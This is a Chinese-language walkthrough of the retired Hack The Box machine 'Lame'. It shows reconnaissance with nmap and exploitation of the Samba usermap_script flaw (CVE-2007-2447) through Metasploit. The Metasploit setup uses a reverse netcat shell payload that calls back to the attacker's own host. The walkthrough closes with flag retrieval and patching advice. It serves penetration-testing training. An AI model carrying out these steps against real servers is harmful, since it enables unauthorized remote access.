HTB: Lame 渗透测试
字数 972 2025-08-15 21:34:01
HTB: Lame 渗透测试教学文档
1. 靶机概述
Hack The Box (HTB) 是一个在线渗透测试平台,提供模拟真实环境的靶机用于技能提升。Lame 是其中一台已退役的靶机,主要特点如下:
- IP地址:10.129.104.53(注:实际IP可能因退役而变化)
- 难度级别:简单
- 主要漏洞:Samba 3.0.20 版本的用户名映射脚本漏洞
2. 信息收集阶段
2.1 初始扫描
使用Nmap进行全端口扫描和版本探测:
nmap -p- -A -O 10.129.104.53
扫描结果:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
2.2 服务分析
-
FTP服务 (21端口)
- 版本:vsftpd 2.3.4
- 已知漏洞:后门漏洞(CVE-2011-2523),但本靶机可能不受影响
-
SSH服务 (22端口)
- 版本:OpenSSH 4.7p1
- 较旧版本,但无直接可利用漏洞
-
Samba服务 (139/445端口)
- 版本:3.0.20-Debian
- 关键漏洞点:用户名映射脚本漏洞
3. 漏洞探测与利用
3.1 漏洞搜索
针对Samba 3.0.20版本搜索可利用漏洞:
searchsploit Samba 3.0.20
发现Metasploit中存在可利用脚本:
exploit/multi/samba/usermap_script
3.2 Metasploit利用步骤
- 启动Metasploit框架:
msfconsole
- 搜索并选择漏洞利用模块:
search Username map script
use exploit/multi/samba/usermap_script
- 设置payload:
set payload cmd/unix/reverse_netcat
- 配置必要参数:
set RHOSTS 10.129.104.53
set RPORT 445
set LHOST [你的本地IP]
set LPORT 4444 # 默认端口,可保持
- 执行攻击:
exploit
3.3 漏洞原理
该漏洞(CVE-2007-2447)存在于Samba 3.0.20-3.0.25rc3版本中,当配置文件中包含:
username map script = /etc/samba/usermap.sh
时,攻击者可以通过在用户名中嵌入shell元字符来执行任意命令。
4. 后渗透阶段
成功利用后将获得一个反向shell连接,可执行以下操作:
- 获取用户flag:
cat /home/[用户名]/user.txt
- 权限提升:
- 检查SUID/GUID文件
- 检查内核版本
- 检查cron作业
- 获取root flag:
cat /root/root.txt
5. 总结与学习要点
-
关键学习点:
- Samba服务漏洞识别与利用
- Metasploit框架的基本使用
- 反向shell的建立与利用
-
扩展研究:
- 研究Samba用户名映射漏洞的详细机制
- 尝试手动利用而不依赖Metasploit
- 探索其他可能的攻击路径(如FTP或SSH)
-
防御建议:
- 及时更新Samba服务到最新版本
- 限制Samba服务的网络访问
- 审查配置文件中的潜在危险选项